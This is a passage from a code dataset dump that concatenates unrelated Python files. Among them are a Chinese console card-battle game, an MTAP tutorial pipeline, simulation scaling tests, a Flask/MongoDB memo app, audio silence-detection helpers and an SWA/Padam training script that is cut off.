INIT_HAND_COUNT\n print(\"**************我的卡牌**************\")\n self.mycards = generate_cards(CARD_NUM)\n self.show_cards(self.mycards)\n self.myhandcards = self.mycards[:INIT_HAND_COUNT]\n print(\"**************敌方卡牌**************\")\n self.enemycards = generate_cards(CARD_NUM)\n self.show_cards(self.enemycards)\n self.enemyhandcards = self.enemycards[:INIT_HAND_COUNT]\n self.round = 1\n self.myturn = True\n self.tired = 0\n\n def use_power(self, hero):\n if hero.hero_class == 'warrior':\n hero.health += 2\n\n def turn_round(self):\n\n self.myhero.use_power = False\n\n self.show_world()\n self.draw_card()\n\n if self.hero_death(self.myhero.health):\n print(\"~~~~~~~~~~~游戏结束,你输了游戏:我方英雄疲劳死!!!~~~~~~~~~~~~~\")\n else:\n self.use_mana_action(self.mana)\n self.show_world_cards(False)\n self.myworldcards, self.enemyworldcards, self.enemyhero = self.battle(self.myworldcards,\n self.enemyworldcards, self.enemyhero)\n\n if self.hero_death(self.enemyhero.health):\n print(\"~~~~~~~~~~~~游戏结束,恭喜你获得胜利:敌方英雄被我方卡牌打死!!!~~~~~~~~~~~~\")\n else:\n self.myturn = False\n\n self.draw_card()\n\n if self.hero_death(self.enemyhero.health):\n print(\"~~~~~~~~~~~游戏结束,恭喜你获得胜利:敌方英雄疲劳死!!!~~~~~~~~~~~~~\")\n else:\n\n self.use_mana_action(self.mana)\n self.show_world_cards(False)\n self.enemyworldcards, self.myworldcards, self.myhero = self.battle(self.enemyworldcards,\n self.myworldcards, self.myhero)\n\n if self.hero_death(self.myhero.health):\n print(\"~~~~~~~~~~~游戏结束,你输了游戏:我方英雄被敌方卡牌打死!!!~~~~~~~~~~~~~\")\n else:\n self.round += 1\n\n # 水晶达到10后不再增加\n if self.mana < 10:\n self.mana += 1\n\n self.init_hand_count += 1\n\n self.myturn = True\n\n self.turn_round()\n\n def draw_card(self):\n '''\n 有牌抽牌,无牌加疲劳值\n :return: \n '''\n if self.init_hand_count < CARD_NUM:\n self.myhandcards.append(self.mycards[self.init_hand_count])\n self.enemyhandcards.append(self.enemycards[self.init_hand_count])\n else:\n self.tired += 1\n print(\"oooooooooooooooooooooooooo本回合疲劳值为:%s\" % self.tired)\n if self.myturn:\n self.myhero.health_change(-self.tired)\n else:\n self.enemyhero.health_change(-self.tired)\n\n def show_world(self):\n print(\"++++++++++++++++++当前回合:%s,当前水晶:%s\" % (self.round, self.mana))\n\n def show_world_cards(self, order):\n '''\n 显示场上卡牌\n :return: \n '''\n if self.myturn:\n if order:\n print(\"$$$$敌方场上卡牌$$$$$$$$$$$$$\")\n for i in range(len(self.enemyworldcards)):\n print(\"{0}-{1}({2}-{3})\".format(i + 1, self.enemyworldcards[i].name, self.enemyworldcards[i].damage,\n self.enemyworldcards[i].remain_health), end=' ')\n else:\n print(\"$$$$我方场上卡牌$$$$$$$$$$$$$\")\n if len(self.myworldcards) == 0:\n print(\"场上没有卡牌!!!\")\n else:\n for card in self.myworldcards:\n card.show()\n else:\n print(\"$$$$敌方场上卡牌$$$$$$$$$$$$$\")\n if len(self.enemyworldcards) == 0:\n print(\"场上没有卡牌!!!\")\n else:\n for card in self.enemyworldcards:\n card.show()\n\n def show_cards(self, cards):\n for i, card in enumerate(cards):\n print(\"\\t%s-%s(%s)\" % (i + 1, card.name, card.mana))\n\n def battle(self, mycards, enemycards, enemyhero):\n \"\"\"\n 攻击对方\n :param mycards: \n :param enemycards: \n :param enemyherohealth: \n :param Auto: True随机对象 False手动选择\n :return: \n \"\"\"\n if len(mycards) > 0:\n for i in range(len(mycards) - 1, -1, -1):\n if len(enemycards) > 0:\n if self.myturn:\n print(\"------------攻击----------------\")\n print(\"{0}({1}-{2}) 准备攻击:\".format(mycards[i].name, mycards[i].damage,\n mycards[i].remain_health))\n print(\"敌方英雄血量={0}\".format(enemyhero.health))\n self.show_world_cards(True)\n attack_hero = 
input(\"\\n>>>>>>>>>>>>>>是否攻击敌方英雄(Y/N),结束回合(Q)?\")\n if attack_hero == 'Q':\n break\n elif attack_hero == 'Y':\n self.enemyhero.health_change(-self.myworldcards[i].damage)\n else:\n enemy_id = self.attack_who(enemycards)\n print(\"%s%s-%s attack %s%s-%s\" % (\n mycards[i].name, mycards[i].damage, mycards[i].remain_health,\n enemycards[enemy_id].name, enemycards[enemy_id].damage,\n enemycards[enemy_id].remain_health))\n mycards[i].attack(enemycards[enemy_id])\n mycards[i].show()\n enemycards[enemy_id].show()\n if mycards[i].alive == False:\n del mycards[i]\n if enemycards[enemy_id].alive == False:\n del enemycards[enemy_id]\n else:\n print(\"------------攻击----------------\")\n print(\"{0}({1}-{2}) 准备攻击:\".format(mycards[i].name, mycards[i].damage,\n mycards[i].remain_health))\n print(\"敌方英雄血量={0}\".format(enemyhero.health))\n self.show_world_cards(True)\n enemy_id = self.attack_who(enemycards)\n print(\"%s%s-%s attack %s%s-%s\" % (\n mycards[i].name, mycards[i].damage, mycards[i].remain_health,\n enemycards[enemy_id].name, enemycards[enemy_id].damage,\n enemycards[enemy_id].remain_health))\n mycards[i].attack(enemycards[enemy_id])\n mycards[i].show()\n enemycards[enemy_id].show()\n if mycards[i].alive == False:\n del mycards[i]\n if enemycards[enemy_id].alive == False:\n del enemycards[enemy_id]\n else:\n if self.myturn:\n print(\"%s-%s攻击敌方英雄\" % (mycards[i].name, mycards[i].damage))\n enemyhero.health -= mycards[i].damage\n print(\"%%%%%%%%%%%敌方英雄生命:\", enemyhero.health)\n else:\n print(\"%s-%s攻击我方英雄\" % (mycards[i].name, mycards[i].damage))\n enemyhero.health -= mycards[i].damage\n print(\"%%%%%%%%%%%我方英雄生命:\", enemyhero.health)\n return mycards, enemycards, enemyhero\n\n def attack(self, attack_card, be_attacked_card, i, enemy_id):\n '''\n\n :param attack_card: \n :param be_attacked_card: \n :param i: \n :param enemy_id: \n :return: \n '''\n print(\"%s%s-%s attack %s%s-%s\" % (\n attack_card[i].name, attack_card[i].damage,\n attack_card[i].remain_health,\n be_attacked_card[enemy_id].name, be_attacked_card[enemy_id].damage,\n be_attacked_card[enemy_id].remain_health))\n attack_card[i].attack(be_attacked_card[enemy_id])\n attack_card[i].show()\n be_attacked_card[enemy_id].show()\n if attack_card[i].alive == False:\n del attack_card[i]\n if be_attacked_card[enemy_id].alive == False:\n del be_attacked_card[enemy_id]\n return attack_card, be_attacked_card\n\n def use_mana_action(self, mana):\n \"\"\"\n 使用英雄技能、卡牌上场\n :param cards: \n :param mana: \n :return: \n \"\"\"\n if self.myturn:\n while self.can_use_power(mana) or self.enough_mana(self.myhandcards, mana):\n print(\"^^^^我方手牌^^^^^^^^^^^^\")\n self.show_cards(self.myhandcards)\n print(\"-----------------剩余水晶为:{0}\".format(mana))\n if self.can_use_power(mana):\n use = input(\">>>>>>>>>>>>>>是否使用英雄技能(Y/N),不再使用水晶(Q):\")\n if use == 'Q':\n break\n elif use == 'Y':\n self.use_power(self.myhero)\n mana -= 2\n self.myhero.use_power = True\n elif self.enough_mana(self.myhandcards, mana):\n goto_num = int(input(\">>>>>>>>>>>>>>请选择你要上场的卡牌号码,不再使用水晶(0):\"))\n if goto_num == 0:\n break\n elif self.myhandcards[goto_num - 1].mana <= mana:\n self.myworldcards.append(self.myhandcards[goto_num - 1])\n print(\"\\t%s-%s(%s)上场!!!\" % (\n goto_num, self.myhandcards[goto_num - 1].name, self.myhandcards[goto_num - 1].mana))\n mana -= self.myhandcards[goto_num - 1].mana\n del self.myhandcards[goto_num - 1]\n else:\n print(\"输入卡牌的水晶({0})大于剩余水晶({1})!\".format(self.myhandcards[goto_num - 1].mana, mana))\n elif use == 'N':\n break\n\n else:\n goto_num = 
int(input(\">>>>>>>>>>>>>>请选择你要上场的卡牌号码,不再使用水晶(0):\"))\n if goto_num == 0:\n break\n elif self.myhandcards[goto_num - 1].mana <= mana:\n self.myworldcards.append(self.myhandcards[goto_num - 1])\n print(\"\\t%s-%s(%s)上场!!!\" % (\n goto_num, self.myhandcards[goto_num - 1].name, self.myhandcards[goto_num - 1].mana))\n mana -= self.myhandcards[goto_num - 1].mana\n del self.myhandcards[goto_num - 1]\n else:\n print(\"输入卡牌的水晶({0})大于剩余水晶({1})!\".format(self.myhandcards[goto_num - 1].mana, mana))\n else:\n print(\"^^^^敌方手牌^^^^^^^^^^^^\")\n self.show_cards(self.enemyhandcards)\n\n for i in range(len(self.enemyhandcards) - 1, -1, -1):\n if self.enemyhandcards[i].mana <= mana:\n self.enemyworldcards.append(self.enemyhandcards[i])\n print(\">>>>>>>>>>>>>>>>>>\")\n print(\n \"\\t%s-%s(%s)上场!!!\" % (i + 1, self.enemyhandcards[i].name, self.enemyhandcards[i].mana))\n mana -= self.enemyhandcards[i].mana\n del self.enemyhandcards[i]\n\n if mana >= 2:\n self.use_power(self.enemyhero)\n mana -= 2\n\n def can_use_power(self, mana):\n '''\n 判断是否可以使用英雄技能\n :param mana: \n :return: \n '''\n can_use = False\n if self.myhero.use_power == False and mana >= 2:\n can_use = True\n return can_use\n\n def enough_mana(self, cards, mana):\n \"\"\"\n 判断是否剩余水晶足够:有卡牌的水晶小于剩余水晶\n :param cards: \n :param mana: \n :return: \n \"\"\"\n enough = False\n for card in cards:\n if card.mana <= mana:\n enough = True\n break\n return enough\n\n def attack_who(self, cards):\n \"\"\"\n 敌方场上卡牌数量>1,我方回合手动选择攻击对象,敌方回合自动攻击\n :param cards: \n :return: \n \"\"\"\n if len(cards) == 1:\n return 0\n elif self.myturn:\n who = int(input(\">>>>>>>>>>>>>>请选择你要攻击的卡牌:\"))\n if who < 1 or who >= len(cards) + 1:\n print(\"输入有误,请重新选择!!!\")\n return self.attack_who(cards)\n return who - 1\n else:\n card_id = randint(0, len(cards) - 1)\n return card_id\n\n def hero_death(self, hero):\n \"\"\"\n 英雄是否死亡\n :param hero: \n :return: \n \"\"\"\n if hero <= 0:\n return True\n\n\ndef main():\n game = world()\n game.turn_round()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"炉火传说/main_v9.0.py","file_name":"main_v9.0.py","file_ext":"py","file_size_in_byte":15775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37171905","text":"# Copyright 2019 Regents of the University of Minnesota.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Hello world tutorial pipeline.\n\nThis example is on the MTAP documentation website, if it stops working please update the associated documentation file\nat ``docs/tutorials/python.md``.\n\"\"\"\nimport sys\n\nif __name__ == '__main__':\n from mtap import Document, Event, Pipeline, events_client\n from mtap import RemoteProcessor\n\n pipeline = Pipeline(\n RemoteProcessor(name='helloprocessor', address=sys.argv[2]),\n )\n with events_client(sys.argv[1]) as client:\n with Event(event_id='1', client=client) as event:\n document = Document(document_name='name', text='YOUR NAME')\n event.add_document(document)\n pipeline.run(document)\n index = document.labels['hello']\n for 
label in index:\n print(label.response)\n","sub_path":"python/mtap/examples/tutorial/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192115040","text":"import logging\n\nimport numpy as np\nimport pandas as pd\n\nimport GTS as gts\nfrom GTS.isc_modelling.setup import _prepare_params\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_conditioning(*, length_scales, scalar_scales, **kwargs):\n \"\"\" Run the 'test_condition_number' for various scaling parameters\n\n Parameters\n ----------\n length_scales, scalar_scales : list\n lists of length- and scalar scales to test.\n **kwargs :\n Recommended to adjust:\n sz : size of mesh elements (uniform)\n shearzone_names : which shearzones (if any) to include\n \"\"\"\n\n # Initialize empty DataFrame for storage\n results = pd.DataFrame(columns=[\"ls\", \"ss\", \"max_elem\", \"max_A_sum\", \"min_A_sum\"])\n\n # loop through all scaling coefficients\n for ls in length_scales:\n for ss in scalar_scales:\n max_elem, max_A_sum, min_A_sum = test_condition_number(\n ls=ls, ss=ss, **kwargs\n )\n v = {\n \"ls\": ls,\n \"ss\": ss,\n \"max_elem\": max_elem,\n \"max_A_sum\": max_A_sum,\n \"min_A_sum\": min_A_sum,\n }\n results = results.append(v, ignore_index=True)\n\n results[\"ratio\"] = results[\"max_A_sum\"] / results[\"min_A_sum\"]\n return results\n\n\ndef test_condition_number(**kwargs):\n # TODO: Rename this method (and dependent notebooks usages)\n # to something more suitable\n \"\"\" Method to create a mesh and discretize equations.\n\n Parameters\n ----------\n **kwargs :\n pass non-default arguments.\n\n Returns\n -------\n max_elem, max_A_sum, min_A_sum : float\n quantitative estimates for condition number\n \"\"\"\n ls = kwargs.get(\"ls\", 1)\n ss = kwargs.get(\"ss\", 1)\n\n params = make_params_for_scaling(**kwargs)\n\n setup = gts.ContactMechanicsBiotISC(params)\n setup.prepare_simulation()\n\n logger.info(f\"ls= {ls:.3e}, ss= {ss:.3e}\")\n return report_condition_number(setup)\n\n\ndef report_condition_number(setup):\n \"\"\" Extract the estimated condition number for a given setup\"\"\"\n\n A, b = setup.assembler.assemble_matrix_rhs()\n logger.info(\"Max element in A {0:.2e}\".format(np.max(np.abs(A))))\n logger.info(\n \"Max {0:.2e} and min {1:.2e} A sum.\".format(\n np.max(np.sum(np.abs(A), axis=1)), np.min(np.sum(np.abs(A), axis=1))\n )\n )\n max_elem = np.max(np.abs(A))\n max_A_sum = np.max(np.sum(np.abs(A), axis=1))\n min_A_sum = np.min(np.sum(np.abs(A), axis=1))\n\n return max_elem, max_A_sum, min_A_sum\n\n\ndef make_params_for_scaling(**kwargs):\n \"\"\" Wrapper to _prepare_params for typical setups these tests will use\n\n You should set:\n ls, ss : scaling\n sz : uniform characteristic size of mesh elements\n shearzone_names : which shearzones to include.\n \"\"\"\n\n # Get some common args\n sz = kwargs.get(\"sz\", 80)\n ls = kwargs.get(\"ls\", 1)\n ss = kwargs.get(\"ss\", 1)\n sz_names = kwargs.get(\n \"shearzone_names\", None\n ) # [\"S1_1\", \"S1_2\", \"S1_3\", \"S3_1\", \"S3_2\"]\n\n params = {\n \"length_scale\": ls,\n \"scalar_scale\": ss,\n \"shearzone_names\": sz_names,\n \"mesh_args\": {\n \"mesh_size_frac\": sz,\n \"mesh_size_min\": sz,\n \"mesh_size_bound\": sz,\n },\n # turn off gravity\n \"_gravity_bc_p\": False,\n \"_gravity_src\": False,\n \"_gravity_bc\": False,\n \"path_head\": kwargs.get(\"path_head\", \"test_fracture_complexity/test_1\"),\n }\n\n params = 
_prepare_params(params=params, setup_loggers=False)\n\n return params\n","sub_path":"src/mastersproject/GTS/test/test_scaling/test_scaling_util.py","file_name":"test_scaling_util.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37029384","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndispData = np.genfromtxt('Damperdisp.out')\ndisp = dispData[:, 1]\nforceData = np.genfromtxt('Damperforce.out')\nforce = forceData[:, 1]\n\nplt.plot(disp, force)\nplt.show()\n","sub_path":"Shear-Frame-with-Viscous-Dampers/Output/forceDisp.py","file_name":"forceDisp.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"564681105","text":"from utils import make_model\nfrom models import NBeatsModel, DualAttentionModel\n\nimport pandas as pd\n\n\ndef make_and_run(input_model, _layers=None, lookback=12, epochs=4, **kwargs):\n\n\n data_config, nn_config, total_intervals = make_model(batch_size=16,\n lookback=lookback,\n lr=0.001,\n epochs=epochs,\n **kwargs)\n nn_config['layers'] = _layers\n\n df = pd.read_csv(\"../data/nasdaq100_padding.csv\")\n\n _model = input_model(data_config=data_config,\n nn_config=nn_config,\n data=df,\n intervals=total_intervals\n )\n\n _model.build_nn()\n\n _ = _model.train_nn(indices='random')\n\n _ = _model.predict(use_datetime_index=False)\n\n return _model\n\n##\n# NBeats based model\nmodel = make_and_run(NBeatsModel)\n\n##\n# DualAttentionModel based model\nmake_and_run(DualAttentionModel)\n","sub_path":"tests/test_models_using_targets.py","file_name":"test_models_using_targets.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283717156","text":"\"\"\"\nFlask web app connects to Mongo database.\nKeep a simple list of dated memoranda.\n\nRepresentation conventions for dates: \n - We use Arrow objects when we want to manipulate dates, but for all\n storage in database, in session or g objects, or anything else that\n needs a text representation, we use ISO date strings. These sort in the\n order as arrow date objects, and they are easy to convert to and from\n arrow date objects. (For display on screen, we use the 'humanize' filter\n below.) A time zone offset will \n - User input/output is in local (to the server) time. \n\"\"\"\n\nimport flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask import jsonify # For AJAX transactions\n\n\nimport json\nimport logging\n\n# Date handling \nimport arrow # Replacement for datetime, based on moment.js\nimport datetime # But we may still need time\nfrom dateutil import tz # For interpreting local times\n\n\n# Mongo database\nfrom pymongo import MongoClient\n\n\n###\n# Globals\n###\nimport CONFIG\n\napp = flask.Flask(__name__)\n\ntry: \n dbclient = MongoClient(CONFIG.MONGO_URL)\n db = dbclient.memos\n collection = db.dated\n\nexcept:\n print(\"Failure opening database. Is Mongo running? 
Correct password?\")\n sys.exit(1)\n\nimport uuid\napp.secret_key = str(uuid.uuid4())\n\n###\n# Pages\n###\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n app.logger.debug(\"Main page entry\")\n flask.session['memos'] = get_memos()\n for memo in flask.session['memos']:\n app.logger.debug(\"Memo: \" + str(memo))\n return flask.render_template('index.html')\n\n\n# Just give the client the requested create.html file\n@app.route(\"/create\")\ndef create():\n app.logger.debug(\"Create\")\n return flask.render_template('create.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n app.logger.debug(\"Page not found\")\n return flask.render_template('page_not_found.html',\n badurl=request.base_url,\n linkback=url_for(\"index\")), 404\n\n\n################\n#\n# Stores the memo in the db\n#\n###############\n@app.route(\"/_store\")\ndef store():\n \"\"\"\"\n Gets the memo and date from create.html\n then stores it in the db then returns\n \"\"\"\n app.logger.debug(\"Entering db handling\")\n text = request.args.get(\"text\", type=str)\n date = request.args.get(\"date\", type=str)\n app.logger.debug(\"text: \" + text)\n app.logger.debug(\"date: \" + date)\n\n #take date and localize it and store it in isoformat\n aDate = arrow.get(date, 'MM/DD/YYYY').replace(tzinfo='local')\n fDate = aDate.isoformat()\n record = { \"type\": \"dated_memo\",\n \"date\": fDate,\n \"text\": text\n }\n\n collection.insert(record)\n rslt = True\n return jsonify(result=rslt)\n\n\n\n###################\n#\n# Deletes the list of memos\n#\n##################\n@app.route(\"/_delete\")\ndef delete():\n \"\"\"\"\n Deletes all selected memos\n Expects a list memo _ids\n Then splits them\n \"\"\"\n memos = request.args.get(\"memos\", type=str)\n app.logger.debug(\"Memo Ids: \" + memos)\n\n remove_memos(memos)\n #return garbage\n rslt = True\n return jsonify(result=rslt)\n\n\n###########\n#\n# just removes memos from db\n#\n##########\ndef remove_memos(mems):\n \"\"\"\n :param mems: list of memo ids\n :return: nothing\n \"\"\"\n #Split it up so we can search for multiple _ids\n ids = mems.split(\" \")\n for entry in collection.find():\n #Now delete if we find it\n if str(entry[\"_id\"]) in ids:\n collection.remove(entry)\n return\n\n\n#used to humanize the date within the client\n@app.template_filter( 'humanize' )\ndef humanize_arrow_date( date ):\n \"\"\"\n Date is internal UTC ISO format string.\n Output should be \"today\", \"yesterday\", \"in 5 days\", etc.\n Arrow will try to humanize down to the minute, so we\n need to catch 'today' as a special case. 
\n \"\"\"\n try:\n then = arrow.get(date).to('local')\n now = arrow.utcnow().to('local')\n tomorrow = now.replace(days=1)\n if then.date() == now.date():\n human = \"Today\"\n elif then.humanize(now) == \"a day ago\":\n human = \"Yesterday\"\n elif tomorrow.date() == then.date():\n human = \"Tomorrow\"\n else: \n human = then.humanize(now)\n if human == \"in a day\":\n human = \"Tomorrow\"\n except: \n human = date\n return human\n\n\n#############\n#\n# Just gets all the memos in the db stores them in a dict sorts then and returns it\n#\n##############\ndef get_memos():\n \"\"\"\n Returns all memos in the database, in a form that\n can be inserted directly in the 'session' object.\n \"\"\"\n records = [ ]\n #if collection is empty return empty records\n if collection.count() == 0:\n return records\n\n for record in collection.find( { \"type\": \"dated_memo\" } ):\n record['date'] = arrow.get(record['date']).isoformat()\n\n #used for saving memos\n record['_id'] = str(record['_id'])\n records.append(record)\n\n #sort the memos\n sorted_records = sorted(records, key=lambda x: x[\"date\"])\n return sorted_records\n\n\nif __name__ == \"__main__\":\n # App is created above so that it will\n # exist whether this is 'main' or not\n # (e.g., if we are running in a CGI script)\n app.debug=CONFIG.DEBUG\n app.logger.setLevel(logging.DEBUG)\n # We run on localhost only if debugging,\n # otherwise accessible to world\n if CONFIG.DEBUG:\n # Reachable only from the same computer\n app.run(port=CONFIG.PORT)\n else:\n # Reachable from anywhere \n app.run(port=CONFIG.PORT,host=\"0.0.0.0\")\n\n \n","sub_path":"flask_main.py","file_name":"flask_main.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"412757329","text":"\"\"\"\nA collection of misc. utilities that are used in the main class.\n\"\"\"\nimport re\n\ndef camelcase_keys(data):\n \"\"\"\n Converts all the keys in a dict to camelcase. It works recursively to convert any nested dicts as well.\n @param data: The dict to convert\n \"\"\"\n return_dict = {}\n for key in data:\n if isinstance(data[key], dict):\n return_dict[underscore_to_camelcase(key)] = camelcase_keys(data[key])\n else:\n return_dict[underscore_to_camelcase(key)] = data[key]\n\n return return_dict\n\ndef camelcase_to_underscore(name):\n \"\"\"\n Converts a string to underscore. (Typically from camelcase.)\n @param name: The string to convert.\n \"\"\"\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)).lower()\n\ndef underscore_to_camelcase(name):\n \"\"\"\n Converts a string to camelcase. (Typically from underscore.)\n @param name: The string to convert.\n \"\"\"\n return re.sub(r'_([a-z])', lambda m: (m.group(1).upper()), name)\n\ndef underscore_keys(data):\n \"\"\"\n Converts all the keys in a dict to camelcase. 
It works recursively to convert any nested dicts as well.\n @param data: The dict to convert\n \"\"\"\n return_dict = {}\n for key in data:\n if isinstance(data[key], dict):\n return_dict[camelcase_to_underscore(key)] = underscore_keys(data[key])\n else:\n return_dict[camelcase_to_underscore(key)] = data[key]\n\n return return_dict\n","sub_path":"PyBambooHR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291899987","text":"import sys\nsys.path.insert(0, \"matrix_test/helper_modules\")\nimport numpy as np\nfrom signalops import rolling_window_lastaxis, calc_rms\n\n\ndef detect_silences(x, fs, threshold=-30.):\n print(\"Detecting silence in wav files...\")\n if len(x.shape) < 2:\n x = x[:, np.newaxis]\n x = x.sum(axis=1)/2.\n env = calc_rms(x, window=int(fs*0.1))\n threshold = (10**(threshold/20.))*np.max(env)\n silence = env < threshold\n # Get segment start end indexes for all silences in envelope\n sil_start = np.where(np.sign(np.diff(silence.astype(float))) == 1)[0]\n sil_end = np.where(np.sign(np.diff(silence.astype(float))) == -1)[0]\n if silence[0]:\n sil_start = np.concatenate([[0], sil_start])\n if silence[-1]:\n sil_end = np.concatenate([sil_end, [env.size]])\n segs = np.vstack([sil_start, sil_end]).T\n validSegs = np.diff(segs) > 0.02*fs\n segs = segs[np.repeat(validSegs, 2, axis=1)].reshape(-1, 2)\n return segs\n\n\ndef slices_to_mask(slices, mask_length):\n out = np.zeros(mask_length, dtype=bool)\n for s in slices:\n out[s[0]:s[1]] = True\n return out\n\n\ndef rms_no_silences(x, fs, threshold):\n silences = detect_silences(x, fs, threshold)\n sil_mask = slices_to_mask(silences, x.size)\n rms = np.sqrt(np.mean(x[~sil_mask]**2))\n return rms\n","sub_path":"snrops.py","file_name":"snrops.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"504207006","text":"import argparse\nimport os\nimport sys\nimport time\nimport tabulate\nimport numpy as np\nimport torch\n\nfrom curvature import data, models, losses, utils\nfrom optimizers import Padam\n\nparser = argparse.ArgumentParser(description='SGD/SWA training')\n#parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n\nparser.add_argument('--dataset', type=str, default='CIFAR10', help='dataset name (default: CIFAR10)')\nparser.add_argument('--data_path', type=str, default=None, required=True, metavar='PATH',\n help='path to datasets location (default: None)')\nparser.add_argument('--use_test', dest='use_test', action='store_true',\n help='use test dataset instead of validation (default: False)')\nparser.add_argument('--batch_size', type=int, default=128, metavar='N', help='input batch size (default: 128)')\nparser.add_argument('--num_workers', type=int, default=4, metavar='N', help='number of workers (default: 4)')\nparser.add_argument('--model', type=str, default=None, required=True, metavar='MODEL',\n help='model name (default: None)')\nparser.add_argument('--ckpt', type=str, default=None, metavar='CKPT',\n help='checkpoint to averaging from (default: None)')\n\nparser.add_argument('--init_epochs', type=int, default=0, metavar='N', help='number of epochs for pretraining (default: 10)')\nparser.add_argument('--save_freq', type=int, default=10, metavar='N', help='save frequency (default: 25)')\nparser.add_argument('--eval_freq', type=int, default=1, 
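                    # NB: the '(default: N)' text in several help strings above (init_epochs,
                    # save_freq, eval_freq) is stale; the default= values given here are what apply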
metavar='N', help='evaluation frequency (default: 5)')\nparser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.1)')\nparser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)')\nparser.add_argument('--wd', type=float, default=1e-4, help='weight decay (default: 1e-4)')\nparser.add_argument('--decoupled_wd', action='store_true', help=\"Enable to use AdamW - decoupled weight decay\")\nparser.add_argument(\"--normalized_wd\", action='store_true',\n help='Whether to use normalised wd. WD = WD_norm \\sqrt(\\frac{b}{BT})')\nparser.add_argument(\"--partial\", type=float, default=0.125, help='Padam partial parameter')\n\nparser.add_argument('--swa_epochs', type=int, default=100, metavar='N', help='number of epochs for swa (default: 100)')\nparser.add_argument('--swa_gap', type=int, default=1, metavar='N', help='swa averaging gap (default: 1)')\n\nparser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\n\nargs = parser.parse_args()\n\nargs.device = None\nif torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n\n# print('Preparing directory %s' % args.dir)\n# os.makedirs(args.dir, exist_ok=True)\n# with open(os.path.join(args.dir, 'command.sh'), 'w') as f:\n# f.write(' '.join(sys.argv))\n# f.write('\\n')\n\nargs.dir = args.ckpt[:-19]\nprint('directory is '+args.dir)\n\ntorch.backends.cudnn.benchmark = True\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\n\nprint('Using model %s' % args.model)\nmodel_cfg = getattr(models, args.model)\n\nloaders, num_classes = data.loaders(\n args.dataset,\n args.data_path,\n args.batch_size,\n args.num_workers,\n model_cfg.transform_train,\n model_cfg.transform_test,\n use_validation=not args.use_test,\n)\n\nprint('Preparing model')\nprint(*model_cfg.args, dict(**model_cfg.kwargs))\nmodel = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs)\nmodel.to(args.device)\n\nprint('SWA training')\nswa_model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs)\nswa_model.to(args.device)\n\ncriterion = losses.cross_entropy\n\nif args.normalized_wd:\n weight_decay = args.wd * np.sqrt(args.batch_size / (args.epochs * args.batch_size * len(loaders['train'])))\nelse:\n weight_decay = args.wd\n\noptimizer = Padam(\n model.parameters(),\n lr=args.lr,\n betas=(0.9, 0.999),\n eps=1e-08,\n weight_decay=weight_decay,\n amsgrad=False,\n decoupled_wd=args.decoupled_wd,\n partial=args.partial\n)\n\nprint('Loading %s' % args.ckpt)\ncheckpoint = torch.load(args.ckpt)\nmodel.load_state_dict(checkpoint['state_dict'])\n\ncolumns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'te_loss', 'te_acc', 'time', 'mem_usage']\n\n\nfor epoch in range(args.init_epochs):\n time_ep = time.time()\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.init_epochs - 1:\n test_res = utils.eval(loaders['test'], model, criterion)\n else:\n test_res = {'loss': None, 'accuracy': None}\n\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n values = [args.init_epochs + epoch + 1, args.lr, train_res['loss'], train_res['accuracy'], test_res['loss'],\n test_res['accuracy'],\n test_res['top5_accuracy'], time_ep, memory_usage]\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='8.4f')\n if epoch % 40 == 
